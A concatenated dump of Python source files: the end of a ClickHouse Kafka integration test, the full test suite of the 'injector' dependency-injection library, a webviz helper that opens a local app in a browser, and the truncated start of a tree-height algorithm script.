a.cPort AS cPort,
a.`r.name` AS `r.name`,
a.`r.class` AS `r.class`,
a.`r.type` AS `r.type`,
a.`r.ttl` AS `r.ttl`,
a.`r.data` AS `r.data`,
a.method AS method
FROM test.test_queue AS a;
''')
instance.wait_for_log_line("Committed offset")
result = instance.query('SELECT * FROM test.log')
expected = '''\
2021-08-15 07:00:00 server1 443 50000 ['1','2'] [0,0] [444,0] [123123,0] ['adsfasd',''] GET
2021-08-15 07:00:02 0 0 [] [] [] [] []
2021-08-15 07:00:02 0 0 [] [] [] [] []
'''
assert TSV(result) == TSV(expected)
# kafka_cluster.open_bash_shell('instance')
if __name__ == '__main__':
cluster.start()
input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
injector_test.py | # encoding: utf-8
#
# Copyright (C) 2010 Alec Thomas <alec@swapoff.org>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
#
# Author: Alec Thomas <alec@swapoff.org>
"""Functional tests for the "Injector" dependency injection framework."""
from contextlib import contextmanager
from typing import Any, NewType
import abc
import sys
import threading
import traceback
import warnings
from typing import Dict, List, NewType
import pytest
from injector import (
Binder,
CallError,
Injector,
Scope,
InstanceProvider,
ClassProvider,
get_bindings,
inject,
multiprovider,
noninjectable,
singleton,
threadlocal,
UnsatisfiedRequirement,
CircularDependency,
Module,
SingletonScope,
ScopeDecorator,
AssistedBuilder,
provider,
ProviderOf,
ClassAssistedBuilder,
Error,
UnknownArgument,
HAVE_ANNOTATED,
)
if HAVE_ANNOTATED:
from injector import Inject, NoInject
def prepare_basic_injection():
class B:
pass
class A:
@inject
def __init__(self, b: B):
"""Construct a new A."""
self.b = b
return A, B
def prepare_nested_injectors():
def configure(binder):
binder.bind(str, to='asd')
parent = Injector(configure)
child = parent.create_child_injector()
return parent, child
def check_exception_contains_stuff(exception, stuff):
stringified = str(exception)
for thing in stuff:
assert thing in stringified, '%r should be present in the exception representation: %s' % (
thing,
stringified,
)
def test_child_injector_inherits_parent_bindings():
parent, child = prepare_nested_injectors()
assert child.get(str) == parent.get(str)
def test_child_injector_overrides_parent_bindings():
parent, child = prepare_nested_injectors()
child.binder.bind(str, to='qwe')
assert (parent.get(str), child.get(str)) == ('asd', 'qwe')
def test_child_injector_rebinds_arguments_for_parent_scope():
class Cls:
val = ""
class A(Cls):
@inject
def __init__(self, val: str):
self.val = val
def configure_parent(binder):
binder.bind(Cls, to=A)
binder.bind(str, to="Parent")
def configure_child(binder):
binder.bind(str, to="Child")
parent = Injector(configure_parent)
assert parent.get(Cls).val == "Parent"
child = parent.create_child_injector(configure_child)
assert child.get(Cls).val == "Child"
def test_scopes_are_only_bound_to_root_injector():
parent, child = prepare_nested_injectors()
class A:
pass
parent.binder.bind(A, to=A, scope=singleton)
assert parent.get(A) is child.get(A)
def test_get_default_injected_instances():
A, B = prepare_basic_injection()
def configure(binder):
binder.bind(A)
binder.bind(B)
injector = Injector(configure)
assert injector.get(Injector) is injector
assert injector.get(Binder) is injector.binder
def test_instantiate_injected_method():
A, _ = prepare_basic_injection()
a = A('Bob')
assert a.b == 'Bob'
def test_method_decorator_is_wrapped():
A, _ = prepare_basic_injection()
assert A.__init__.__doc__ == 'Construct a new A.'
assert A.__init__.__name__ == '__init__'
def test_decorator_works_for_function_with_no_args():
@inject
def wrapped(*args, **kwargs):
pass
def test_providers_arent_called_for_dependencies_that_are_already_provided():
def configure(binder):
binder.bind(int, to=lambda: 1 / 0)
class A:
@inject
def __init__(self, i: int):
pass
injector = Injector(configure)
builder = injector.get(AssistedBuilder[A])
with pytest.raises(ZeroDivisionError):
builder.build()
builder.build(i=3)
def test_inject_direct():
A, B = prepare_basic_injection()
def configure(binder):
binder.bind(A)
binder.bind(B)
injector = Injector(configure)
a = injector.get(A)
assert isinstance(a, A)
assert isinstance(a.b, B)
def test_configure_multiple_modules():
A, B = prepare_basic_injection()
def configure_a(binder):
binder.bind(A)
def configure_b(binder):
binder.bind(B)
injector = Injector([configure_a, configure_b])
a = injector.get(A)
assert isinstance(a, A)
assert isinstance(a.b, B)
def test_inject_with_missing_dependency():
A, _ = prepare_basic_injection()
def configure(binder):
binder.bind(A)
injector = Injector(configure, auto_bind=False)
with pytest.raises(UnsatisfiedRequirement):
injector.get(A)
def test_inject_named_interface():
class B:
pass
class A:
@inject
def __init__(self, b: B):
self.b = b
def configure(binder):
binder.bind(A)
binder.bind(B)
injector = Injector(configure)
a = injector.get(A)
assert isinstance(a, A)
assert isinstance(a.b, B)
def prepare_transitive_injection():
class C:
pass
class B:
@inject
def __init__(self, c: C):
self.c = c
class A:
@inject
def __init__(self, b: B):
self.b = b
return A, B, C
def test_transitive_injection():
A, B, C = prepare_transitive_injection()
def configure(binder):
binder.bind(A)
binder.bind(B)
binder.bind(C)
injector = Injector(configure)
a = injector.get(A)
assert isinstance(a, A)
assert isinstance(a.b, B)
assert isinstance(a.b.c, C)
def test_transitive_injection_with_missing_dependency():
A, B, _ = prepare_transitive_injection()
def configure(binder):
binder.bind(A)
binder.bind(B)
injector = Injector(configure, auto_bind=False)
with pytest.raises(UnsatisfiedRequirement):
injector.get(A)
with pytest.raises(UnsatisfiedRequirement):
injector.get(B)
def test_inject_singleton():
class B:
pass
class A:
@inject
def __init__(self, b: B):
self.b = b
def configure(binder):
binder.bind(A)
binder.bind(B, scope=SingletonScope)
injector1 = Injector(configure)
a1 = injector1.get(A)
a2 = injector1.get(A)
assert a1.b is a2.b
def test_inject_decorated_singleton_class():
@singleton
class B:
pass
class A:
@inject
def __init__(self, b: B):
self.b = b
def configure(binder):
binder.bind(A)
binder.bind(B)
injector1 = Injector(configure)
a1 = injector1.get(A)
a2 = injector1.get(A)
assert a1.b is a2.b
def test_threadlocal():
@threadlocal
class A:
def __init__(self):
pass
def configure(binder):
binder.bind(A)
injector = Injector(configure)
a1 = injector.get(A)
a2 = injector.get(A)
assert a1 is a2
a3 = [None]
ready = threading.Event()
def inject_a3():
a3[0] = injector.get(A)
ready.set()
threading.Thread(target=inject_a3).start()
ready.wait(1.0)
assert a2 is not a3[0] and a3[0] is not None
def test_injecting_interface_implementation():
class Interface:
pass
class Implementation:
pass
class A:
@inject
def __init__(self, i: Interface):
self.i = i
def configure(binder):
binder.bind(A)
binder.bind(Interface, to=Implementation)
injector = Injector(configure)
a = injector.get(A)
assert isinstance(a.i, Implementation)
def test_cyclic_dependencies():
class Interface:
pass
class A:
@inject
def __init__(self, i: Interface):
self.i = i
class B:
@inject
def __init__(self, a: A):
self.a = a
def configure(binder):
binder.bind(Interface, to=B)
binder.bind(A)
injector = Injector(configure)
with pytest.raises(CircularDependency):
injector.get(A)
def test_dependency_cycle_can_be_worked_broken_by_assisted_building():
class Interface:
pass
class A:
@inject
def __init__(self, i: Interface):
self.i = i
class B:
@inject
def __init__(self, a_builder: AssistedBuilder[A]):
self.a = a_builder.build(i=self)
def configure(binder):
binder.bind(Interface, to=B)
binder.bind(A)
injector = Injector(configure)
# Previously it'd detect a circular dependency here:
# 1. Constructing A requires Interface (bound to B)
# 2. Constructing B requires assisted build of A
# 3. Constructing A triggers circular dependency check
assert isinstance(injector.get(A), A)
def test_that_injection_is_lazy():
class Interface:
constructed = False
def __init__(self):
Interface.constructed = True
class A:
@inject
def __init__(self, i: Interface):
self.i = i
def configure(binder):
binder.bind(Interface)
binder.bind(A)
injector = Injector(configure)
assert not (Interface.constructed)
injector.get(A)
assert Interface.constructed
def test_module_provider():
class MyModule(Module):
@provider
def provide_name(self) -> str:
return 'Bob'
module = MyModule()
injector = Injector(module)
assert injector.get(str) == 'Bob'
def test_module_class_gets_instantiated():
name = 'Meg'
class MyModule(Module):
def configure(self, binder):
binder.bind(str, to=name)
injector = Injector(MyModule)
assert injector.get(str) == name
def test_inject_and_provide_coexist_happily():
class MyModule(Module):
@provider
def provide_weight(self) -> float:
return 50.0
@provider
def provide_age(self) -> int:
return 25
# TODO(alec) Make provider/inject order independent.
@provider
@inject
def provide_description(self, age: int, weight: float) -> str:
return 'Bob is %d and weighs %0.1fkg' % (age, weight)
assert Injector(MyModule()).get(str) == 'Bob is 25 and weighs 50.0kg'
def test_multibind():
Names = NewType('Names', List[str])
Passwords = NewType('Ages', Dict[str, str])
# First let's have some explicit multibindings
def configure(binder):
binder.multibind(List[str], to=['not a name'])
binder.multibind(Dict[str, str], to={'asd': 'qwe'})
# To make sure Lists and Dicts of different subtypes are treated distinctly
binder.multibind(List[int], to=[1, 2, 3])
binder.multibind(Dict[str, int], to={'weight': 12})
# To see that NewTypes are treated distinctly
binder.multibind(Names, to=['Bob'])
binder.multibind(Passwords, to={'Bob': 'password1'})
# Then @multiprovider-decorated Module methods
class CustomModule(Module):
@multiprovider
def provide_some_ints(self) -> List[int]:
return [4, 5, 6]
@multiprovider
def provide_some_strs(self) -> List[str]:
return ['not a name either']
@multiprovider
def provide_str_to_str_mapping(self) -> Dict[str, str]:
return {'xxx': 'yyy'}
@multiprovider
def provide_str_to_int_mapping(self) -> Dict[str, int]:
return {'height': 33}
@multiprovider
def provide_names(self) -> Names:
return ['Alice', 'Clarice']
@multiprovider
def provide_passwords(self) -> Passwords:
return {'Alice': 'aojrioeg3', 'Clarice': 'clarice30'}
injector = Injector([configure, CustomModule])
assert injector.get(List[str]) == ['not a name', 'not a name either']
assert injector.get(List[int]) == [1, 2, 3, 4, 5, 6]
assert injector.get(Dict[str, str]) == {'asd': 'qwe', 'xxx': 'yyy'}
assert injector.get(Dict[str, int]) == {'weight': 12, 'height': 33}
assert injector.get(Names) == ['Bob', 'Alice', 'Clarice']
assert injector.get(Passwords) == {'Bob': 'password1', 'Alice': 'aojrioeg3', 'Clarice': 'clarice30'}
def test_regular_bind_and_provider_dont_work_with_multibind():
# We only want multibind and multiprovider to work to avoid confusion
Names = NewType('Names', List[str])
Passwords = NewType('Passwords', Dict[str, str])
class MyModule(Module):
with pytest.raises(Error):
@provider
def provide_strs(self) -> List[str]:
return []
with pytest.raises(Error):
@provider
def provide_names(self) -> Names:
return []
with pytest.raises(Error):
@provider
def provide_strs_in_dict(self) -> Dict[str, str]:
return {}
with pytest.raises(Error):
@provider
def provide_passwords(self) -> Passwords:
return {}
injector = Injector()
binder = injector.binder
with pytest.raises(Error):
binder.bind(List[str], to=[])
with pytest.raises(Error):
binder.bind(Names, to=[])
with pytest.raises(Error):
binder.bind(Dict[str, str], to={})
with pytest.raises(Error):
binder.bind(Passwords, to={})
def test_auto_bind():
class A:
pass
injector = Injector()
assert isinstance(injector.get(A), A)
def test_auto_bind_with_newtype():
# Reported in https://github.com/alecthomas/injector/issues/117
class A:
pass
AliasOfA = NewType('AliasOfA', A)
injector = Injector()
assert isinstance(injector.get(AliasOfA), A)
def test_custom_scope():
class RequestScope(Scope):
def configure(self):
self.context = None
@contextmanager
def __call__(self, request):
assert self.context is None
self.context = {}
binder = self.injector.get(Binder)
binder.bind(Request, to=request, scope=RequestScope)
yield
self.context = None
def get(self, key, provider):
if self.context is None:
raise UnsatisfiedRequirement(None, key)
try:
return self.context[key]
except KeyError:
provider = InstanceProvider(provider.get(self.injector))
self.context[key] = provider
return provider
request = ScopeDecorator(RequestScope)
class Request:
pass
@request
class Handler:
def __init__(self, request):
self.request = request
class RequestModule(Module):
@provider
@inject
def handler(self, request: Request) -> Handler:
return Handler(request)
injector = Injector([RequestModule()], auto_bind=False)
with pytest.raises(UnsatisfiedRequirement):
injector.get(Handler)
scope = injector.get(RequestScope)
request = Request()
with scope(request):
handler = injector.get(Handler)
assert handler.request is request
with pytest.raises(UnsatisfiedRequirement):
injector.get(Handler)
def test_binder_install():
class ModuleA(Module):
def configure(self, binder):
binder.bind(str, to='hello world')
class ModuleB(Module):
def configure(self, binder):
binder.install(ModuleA())
injector = Injector([ModuleB()])
assert injector.get(str) == 'hello world'
def test_binder_provider_for_method_with_explicit_provider():
injector = Injector()
binder = injector.binder
provider = binder.provider_for(int, to=InstanceProvider(1))
assert type(provider) is InstanceProvider
assert provider.get(injector) == 1
def test_binder_provider_for_method_with_instance():
injector = Injector()
binder = injector.binder
provider = binder.provider_for(int, to=1)
assert type(provider) is InstanceProvider
assert provider.get(injector) == 1
def test_binder_provider_for_method_with_class():
injector = Injector()
binder = injector.binder
provider = binder.provider_for(int)
assert type(provider) is ClassProvider
assert provider.get(injector) == 0
def test_binder_provider_for_method_with_class_to_specific_subclass():
class A:
pass
class B(A):
pass
injector = Injector()
binder = injector.binder
provider = binder.provider_for(A, B)
assert type(provider) is ClassProvider
assert isinstance(provider.get(injector), B)
def test_binder_provider_for_type_with_metaclass():
# use a metaclass cross python2/3 way
# otherwise should be:
# class A(object, metaclass=abc.ABCMeta):
# passa
A = abc.ABCMeta('A', (object,), {})
injector = Injector()
binder = injector.binder
assert isinstance(binder.provider_for(A, None).get(injector), A)
def test_injecting_undecorated_class_with_missing_dependencies_raises_the_right_error():
class ClassA:
def __init__(self, parameter):
pass
class ClassB:
@inject
def __init__(self, a: ClassA):
pass
injector = Injector()
try:
injector.get(ClassB)
except CallError as ce:
check_exception_contains_stuff(ce, ('ClassA.__init__', 'ClassB'))
def test_call_to_method_with_legitimate_call_error_raises_type_error():
class A:
def __init__(self):
max()
injector = Injector()
with pytest.raises(TypeError):
injector.get(A)
def test_call_error_str_representation_handles_single_arg():
ce = CallError('zxc')
assert str(ce) == 'zxc'
class NeedsAssistance:
@inject
def __init__(self, a: str, b):
self.a = a
self.b = b
def test_assisted_builder_works_when_got_directly_from_injector():
injector = Injector()
builder = injector.get(AssistedBuilder[NeedsAssistance])
obj = builder.build(b=123)
assert (obj.a, obj.b) == (str(), 123)
def test_assisted_builder_works_when_injected():
class X:
@inject
def __init__(self, builder: AssistedBuilder[NeedsAssistance]):
self.obj = builder.build(b=234)
injector = Injector()
x = injector.get(X)
assert (x.obj.a, x.obj.b) == (str(), 234)
def test_assisted_builder_uses_bindings():
class Interface:
b = 0
def configure(binder):
binder.bind(Interface, to=NeedsAssistance)
injector = Injector(configure)
builder = injector.get(AssistedBuilder[Interface])
x = builder.build(b=333)
assert (type(x), x.b) == (NeedsAssistance, 333)
def test_assisted_builder_uses_concrete_class_when_specified():
class X:
pass
def configure(binder):
# meant only to show that provider isn't called
binder.bind(X, to=lambda: 1 / 0)
injector = Injector(configure)
builder = injector.get(ClassAssistedBuilder[X])
builder.build()
def test_assisted_builder_injection_is_safe_to_use_with_multiple_injectors():
class X:
@inject
def __init__(self, builder: AssistedBuilder[NeedsAssistance]):
self.builder = builder
i1, i2 = Injector(), Injector()
b1 = i1.get(X).builder
b2 = i2.get(X).builder
assert (b1._injector, b2._injector) == (i1, i2)
class TestThreadSafety:
def setup(self):
self.event = threading.Event()
def configure(binder):
binder.bind(str, to=lambda: self.event.wait() and 'this is str')
class XXX:
@inject
def __init__(self, s: str):
pass
self.injector = Injector(configure)
self.cls = XXX
def gather_results(self, count):
objects = []
lock = threading.Lock()
def target():
o = self.injector.get(self.cls)
with lock:
objects.append(o)
threads = [threading.Thread(target=target) for i in range(count)]
for t in threads:
t.start()
self.event.set()
for t in threads:
t.join()
return objects
def test_injection_is_thread_safe(self):
objects = self.gather_results(2)
assert len(objects) == 2
def test_singleton_scope_is_thread_safe(self):
self.injector.binder.bind(self.cls, scope=singleton)
a, b = self.gather_results(2)
assert a is b
def test_provider_and_scope_decorator_collaboration():
@provider
@singleton
def provider_singleton() -> int:
return 10
@singleton
@provider
def singleton_provider() -> int:
return 10
assert provider_singleton.__binding__.scope == SingletonScope
assert singleton_provider.__binding__.scope == SingletonScope
def test_injecting_into_method_of_object_that_is_falseish_works():
# regression test
class X(dict):
@inject
def __init__(self, s: str):
pass
injector = Injector()
injector.get(X)
def test_callable_provider_injection():
Name = NewType("Name", str)
Message = NewType("Message", str)
@inject
def create_message(name: Name):
return "Hello, " + name
def configure(binder):
binder.bind(Name, to="John")
binder.bind(Message, to=create_message)
injector = Injector([configure])
msg = injector.get(Message)
assert msg == "Hello, John"
def test_providerof():
counter = [0]
def provide_str():
counter[0] += 1
return 'content'
def configure(binder):
binder.bind(str, to=provide_str)
injector = Injector(configure)
assert counter[0] == 0
provider = injector.get(ProviderOf[str])
assert counter[0] == 0
assert provider.get() == 'content'
assert counter[0] == 1
assert provider.get() == injector.get(str)
assert counter[0] == 3
def test_providerof_cannot_be_bound():
def configure(binder):
binder.bind(ProviderOf[int], to=InstanceProvider(None))
with pytest.raises(Exception):
Injector(configure)
def test_providerof_is_safe_to_use_with_multiple_injectors():
def configure1(binder):
binder.bind(int, to=1)
def configure2(binder):
binder.bind(int, to=2)
injector1 = Injector(configure1)
injector2 = Injector(configure2)
provider_of = ProviderOf[int]
provider1 = injector1.get(provider_of)
provider2 = injector2.get(provider_of)
assert provider1.get() == 1
assert provider2.get() == 2
def test_special_interfaces_work_with_auto_bind_disabled():
class InjectMe:
pass
def configure(binder):
binder.bind(InjectMe, to=InstanceProvider(InjectMe()))
injector = Injector(configure, auto_bind=False)
# This line used to fail with:
# Traceback (most recent call last):
# File "/projects/injector/injector_test.py", line 1171,
# in test_auto_bind_disabled_regressions
# injector.get(ProviderOf(InjectMe))
# File "/projects/injector/injector.py", line 687, in get
# binding = self.binder.get_binding(None, key)
# File "/projects/injector/injector.py", line 459, in get_binding
# raise UnsatisfiedRequirement(cls, key)
# UnsatisfiedRequirement: unsatisfied requirement on
# <injector.ProviderOf object at 0x10ff01550>
injector.get(ProviderOf[InjectMe])
# This used to fail with an error similar to the ProviderOf one
injector.get(ClassAssistedBuilder[InjectMe])
def test_binding_an_instance_regression():
text = b'hello'.decode()
def configure(binder):
# Yes, this binding doesn't make sense strictly speaking but
# it's just a sample case.
binder.bind(bytes, to=text)
injector = Injector(configure)
# This used to return empty bytes instead of the expected string
assert injector.get(bytes) == text
def test_class_assisted_builder_of_partially_injected_class_old():
class A:
pass
class B:
@inject
def __init__(self, a: A, b: str):
self.a = a
self.b = b
class C:
@inject
def __init__(self, a: A, builder: ClassAssistedBuilder[B]):
self.a = a
self.b = builder.build(b='C')
c = Injector().get(C)
assert isinstance(c, C)
assert isinstance(c.b, B)
assert isinstance(c.b.a, A)
def test_implicit_injection_for_python3():
class A:
pass
class B:
@inject
def __init__(self, a: A):
self.a = a
class C:
@inject
def __init__(self, b: B):
self.b = b
injector = Injector()
c = injector.get(C)
assert isinstance(c, C)
assert isinstance(c.b, B)
assert isinstance(c.b.a, A)
def test_annotation_based_injection_works_in_provider_methods():
class MyModule(Module):
def configure(self, binder):
binder.bind(int, to=42)
@provider
def provide_str(self, i: int) -> str:
return str(i)
@singleton
@provider
def provide_object(self) -> object:
return object()
injector = Injector(MyModule)
assert injector.get(str) == '42'
assert injector.get(object) is injector.get(object)
def test_assisted_building_is_supported():
class Fetcher:
def fetch(self, user_id):
assert user_id == 333
return {'name': 'John'}
class Processor:
@noninjectable('provider_id')
@inject
@noninjectable('user_id')
def __init__(self, fetcher: Fetcher, user_id: int, provider_id: str):
assert provider_id == 'not injected'
data = fetcher.fetch(user_id)
self.name = data['name']
def configure(binder):
binder.bind(int, to=897)
binder.bind(str, to='injected')
injector = Injector(configure)
processor_builder = injector.get(AssistedBuilder[Processor])
with pytest.raises(CallError):
processor_builder.build()
processor = processor_builder.build(user_id=333, provider_id='not injected')
assert processor.name == 'John'
def test_raises_when_noninjectable_arguments_defined_with_invalid_arguments():
with pytest.raises(UnknownArgument):
class A:
@inject
@noninjectable('c')
def __init__(self, b: str):
self.b = b
def test_can_create_instance_with_untyped_noninjectable_argument():
class Parent:
@inject
@noninjectable('child1', 'child2')
def __init__(self, child1, *, child2):
self.child1 = child1
self.child2 = child2
injector = Injector()
parent_builder = injector.get(AssistedBuilder[Parent])
parent = parent_builder.build(child1='injected1', child2='injected2')
assert parent.child1 == 'injected1'
assert parent.child2 == 'injected2'
def test_implicit_injection_fails_when_annotations_are_missing():
class A:
def __init__(self, n):
self.n = n
injector = Injector()
with pytest.raises(CallError):
injector.get(A)
def test_injection_works_in_presence_of_return_value_annotation():
# Code with PEP 484-compatible type hints will have __init__ methods
# annotated as returning None[1] and this didn't work well with Injector.
#
# [1] https://www.python.org/dev/peps/pep-0484/#the-meaning-of-annotations
class A:
@inject
def __init__(self, s: str) -> None:
self.s = s
def configure(binder):
binder.bind(str, to='this is string')
injector = Injector([configure])
# Used to fail with:
# injector.UnknownProvider: couldn't determine provider for None to None
a = injector.get(A)
# Just a sanity check, if the code above worked we're almost certain
# we're good but just in case the return value annotation handling changed
# something:
assert a.s == 'this is string'
def test_things_dont_break_in_presence_of_args_or_kwargs():
class A:
@inject
def __init__(self, s: str, *args: int, **kwargs: str):
assert not args
assert not kwargs
injector = Injector()
# The following line used to fail with something like this:
# Traceback (most recent call last):
# File "/ve/injector/injector_test_py3.py", line 192,
# in test_things_dont_break_in_presence_of_args_or_kwargs
# injector.get(A)
# File "/ve/injector/injector.py", line 707, in get
# result = scope_instance.get(key, binding.provider).get(self)
# File "/ve/injector/injector.py", line 142, in get
# return injector.create_object(self._cls)
# File "/ve/injector/injector.py", line 744, in create_object
# init(instance, **additional_kwargs)
# File "/ve/injector/injector.py", line 1082, in inject
# kwargs=kwargs
# File "/ve/injector/injector.py", line 851, in call_with_injection
# **dependencies)
# File "/ve/injector/injector_test_py3.py", line 189, in __init__
# assert not kwargs
# AssertionError: assert not {'args': 0, 'kwargs': ''}
injector.get(A)
def test_forward_references_in_annotations_are_handled():
# See https://www.python.org/dev/peps/pep-0484/#forward-references for details
class CustomModule(Module):
@provider
def provide_x(self) -> 'X':
return X('hello')
@inject
def fun(s: 'X') -> 'X':
return s
# The class needs to be module-global in order for the string -> object
# resolution mechanism to work. I could make it work with locals but it
# doesn't seem worth it.
global X
class X:
def __init__(self, message: str) -> None:
self.message = message
try:
injector = Injector(CustomModule)
assert injector.call_with_injection(fun).message == 'hello'
finally:
del X
def test_more_useful_exception_is_raised_when_parameters_type_is_any():
@inject
def fun(a: Any) -> None:
pass
injector = Injector()
# This was the exception before:
#
# TypeError: Cannot instantiate <class 'typing.AnyMeta'>
#
# Now:
#
# injector.CallError: Call to AnyMeta.__new__() failed: Cannot instantiate
# <class 'typing.AnyMeta'> (injection stack: ['injector_test_py3'])
#
# In this case the injection stack doesn't provide too much information but
# it quickly gets helpful when the stack gets deeper.
with pytest.raises((CallError, TypeError)):
injector.call_with_injection(fun)
def test_optionals_are_ignored_for_now():
@inject
def fun(s: str = None):
return s
assert Injector().call_with_injection(fun) == ''
def test_explicitly_passed_parameters_override_injectable_values():
# The class needs to be defined globally for the 'X' forward reference to be able to be resolved.
global X
# We test a method on top of regular function to exercise the code path that's
# responsible for handling methods.
class X:
@inject
def method(self, s: str) -> str:
return s
@inject
def method_typed_self(self: 'X', s: str) -> str:
return s
@inject
def function(s: str) -> str:
return s
injection_counter = 0
def provide_str() -> str:
nonlocal injection_counter
injection_counter += 1
return 'injected string'
def configure(binder: Binder) -> None:
binder.bind(str, to=provide_str)
injector = Injector([configure])
x = X()
try:
assert injection_counter == 0
assert injector.call_with_injection(x.method) == 'injected string'
assert injection_counter == 1
assert injector.call_with_injection(x.method_typed_self) == 'injected string'
assert injection_counter == 2
assert injector.call_with_injection(function) == 'injected string'
assert injection_counter == 3
assert injector.call_with_injection(x.method, args=('passed string',)) == 'passed string'
assert injection_counter == 3
assert injector.call_with_injection(x.method_typed_self, args=('passed string',)) == 'passed string'
assert injection_counter == 3
assert injector.call_with_injection(function, args=('passed string',)) == 'passed string'
assert injection_counter == 3
assert injector.call_with_injection(x.method, kwargs={'s': 'passed string'}) == 'passed string'
assert injection_counter == 3
assert (
injector.call_with_injection(x.method_typed_self, kwargs={'s': 'passed string'})
== 'passed string'
)
assert injection_counter == 3
assert injector.call_with_injection(function, kwargs={'s': 'passed string'}) == 'passed string'
assert injection_counter == 3
finally:
del X
def test_class_assisted_builder_of_partially_injected_class():
class A:
pass
class B:
@inject
def __init__(self, a: A, b: str):
self.a = a
self.b = b
class C:
@inject
def __init__(self, a: A, builder: ClassAssistedBuilder[B]):
self.a = a
self.b = builder.build(b='C')
c = Injector().get(C)
assert isinstance(c, C)
assert isinstance(c.b, B)
assert isinstance(c.b.a, A)
# The test taken from Alec Thomas' pull request: https://github.com/alecthomas/injector/pull/73
def test_child_scope():
TestKey = NewType('TestKey', str)
TestKey2 = NewType('TestKey2', str)
def parent_module(binder):
binder.bind(TestKey, to='in parent', scope=singleton)
def first_child_module(binder):
binder.bind(TestKey2, to='in first child', scope=singleton)
def second_child_module(binder):
binder.bind(TestKey2, to='in second child', scope=singleton)
injector = Injector(modules=[parent_module])
first_child_injector = injector.create_child_injector(modules=[first_child_module])
second_child_injector = injector.create_child_injector(modules=[second_child_module])
assert first_child_injector.get(TestKey) is first_child_injector.get(TestKey)
assert first_child_injector.get(TestKey) is second_child_injector.get(TestKey)
assert first_child_injector.get(TestKey2) is not second_child_injector.get(TestKey2)
def test_custom_scopes_work_as_expected_with_child_injectors():
class CustomSingletonScope(SingletonScope):
pass
custom_singleton = ScopeDecorator(CustomSingletonScope)
def parent_module(binder):
binder.bind(str, to='parent value', scope=custom_singleton)
def child_module(binder):
binder.bind(str, to='child value', scope=custom_singleton)
parent = Injector(modules=[parent_module])
child = parent.create_child_injector(modules=[child_module])
print('parent, child: %s, %s' % (parent, child))
assert parent.get(str) == 'parent value'
assert child.get(str) == 'child value'
# Test for https://github.com/alecthomas/injector/issues/75
def test_inject_decorator_does_not_break_manual_construction_of_pyqt_objects():
class PyQtFake:
@inject
def __init__(self):
pass
def __getattribute__(self, item):
if item == '__injector__':
raise RuntimeError(
'A PyQt class would raise this exception if getting '
'self.__injector__ before __init__ is called and '
'self.__injector__ has not been set by Injector.'
)
return object.__getattribute__(self, item)
instance = PyQtFake() # This used to raise the exception
assert isinstance(instance, PyQtFake)
def test_using_an_assisted_builder_with_a_provider_raises_an_injector_error():
class A:
pass
class MyModule(Module):
@provider
def provide_a(self, builder: AssistedBuilder[A]) -> A:
return builder.build()
injector = Injector(MyModule)
with pytest.raises(Error):
injector.get(A)
def test_newtype_integration_works():
UserID = NewType('UserID', int)
def configure(binder):
binder.bind(UserID, to=123)
injector = Injector([configure])
assert injector.get(UserID) == 123
@pytest.mark.skipif(sys.version_info < (3, 6), reason="Requires Python 3.6+")
def test_dataclass_integration_works():
import dataclasses
# Python 3.6+-only syntax below
exec(
"""
@inject
@dataclasses.dataclass
class Data:
name: str
""",
locals(),
globals(),
)
def configure(binder):
binder.bind(str, to='data')
injector = Injector([configure])
assert injector.get(Data).name == 'data'
def test_get_bindings():
def function1(a: int) -> None:
pass
assert get_bindings(function1) == {}
@inject
def function2(a: int) -> None:
pass
assert get_bindings(function2) == {'a': int}
@inject
@noninjectable('b')
def function3(a: int, b: str) -> None:
pass
assert get_bindings(function3) == {'a': int}
if HAVE_ANNOTATED:
# The simple case of no @inject but injection requested with Inject[...]
def function4(a: Inject[int], b: str) -> None:
pass
assert get_bindings(function4) == {'a': int}
# Using @inject with Inject is redundant but it should not break anything
@inject
def function5(a: Inject[int], b: str) -> None:
pass
assert get_bindings(function5) == {'a': int, 'b': str}
# We need to be able to exclude a parameter from injection with NoInject
@inject
def function6(a: int, b: NoInject[str]) -> None:
pass
assert get_bindings(function6) == {'a': int}
# The presence of NoInject should not trigger anything on its own
def function7(a: int, b: NoInject[str]) -> None:
pass
assert get_bindings(function7) == {}
|
_localhost_open_browser.py | import os
import time
import urllib
import warnings
import threading
import webbrowser
from .._is_reload_process import is_reload_process
from .._user_preferences import get_user_preference
from . import terminal_colors
class LocalhostOpenBrowser:
# pylint: disable=too-few-public-methods
def __init__(self, port: int, token: str):
self._port = port
self._token = token
if not is_reload_process():
# Only open new browser tab if not a reload process
threading.Thread(target=self._timer).start()
def _timer(self) -> None:
"""Waits until the app is ready, and then opens the page
in the default browser.
"""
timeout = 120 # maximum number of seconds to wait before timeout
for _ in range(timeout):
if self._app_ready():
self._open_new_tab()
return
time.sleep(1)
print(
f"WARNING: Webviz application still not ready after {timeout}s.\n"
"Will not open browser automatically. Your private one-time login link:\n"
f"{self._url(with_token=True)}"
)
def _url(self, with_token: bool = False, https: bool = True) -> str:
return (
f"{'https' if https else 'http'}://localhost:{self._port}"
+ f"{'?ott=' + self._token if with_token else ''}"
)
@staticmethod
def _get_browser_controller() -> webbrowser.BaseBrowser:
if get_user_preference("browser") is not None:
try:
return webbrowser.get(using=get_user_preference("browser"))
except webbrowser.Error:
warnings.warn("Could not find the user preferred browser.")
for browser in ["chrome", "chromium-browser"]:
try:
return webbrowser.get(using=browser)
except webbrowser.Error:
pass
# Return default browser if none of the
# preferred browsers are installed:
return webbrowser.get()
def _app_ready(self) -> bool:
"""Check if the flask instance is ready."""
no_proxy_env = os.environ.get("NO_PROXY")
os.environ["NO_PROXY"] = "localhost"
try:
urllib.request.urlopen(self._url(https=False)) # nosec
app_ready = True
except urllib.error.URLError: # type: ignore[attr-defined]
# The flask instance has not started
app_ready = False
except ConnectionResetError:
# The flask instance has started but (correctly) abort
# request due to "401 Unauthorized"
app_ready = True
finally:
os.environ["NO_PROXY"] = no_proxy_env if no_proxy_env else ""
return app_ready
def _open_new_tab(self) -> None:
"""Open the url (with token) in the default browser."""
print(
f"{terminal_colors.GREEN}{terminal_colors.BOLD}"
f" Opening the application ({self._url()}) in your browser.\n"
" Press CTRL + C in this terminal window to stop the application."
f"{terminal_colors.END}"
)
LocalhostOpenBrowser._get_browser_controller().open_new_tab(
self._url(with_token=True)
)
|
Tree Height.py | >>
import sys, threading
sys.setrecursionlimit(10**7) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
class TreeHeight:
def read(self):
self.n = int(sys.stdin.readline())
self.parent = list(map(int, sys.stdin.readline().split()))
def compute_height(self):
maxHeight = 0;
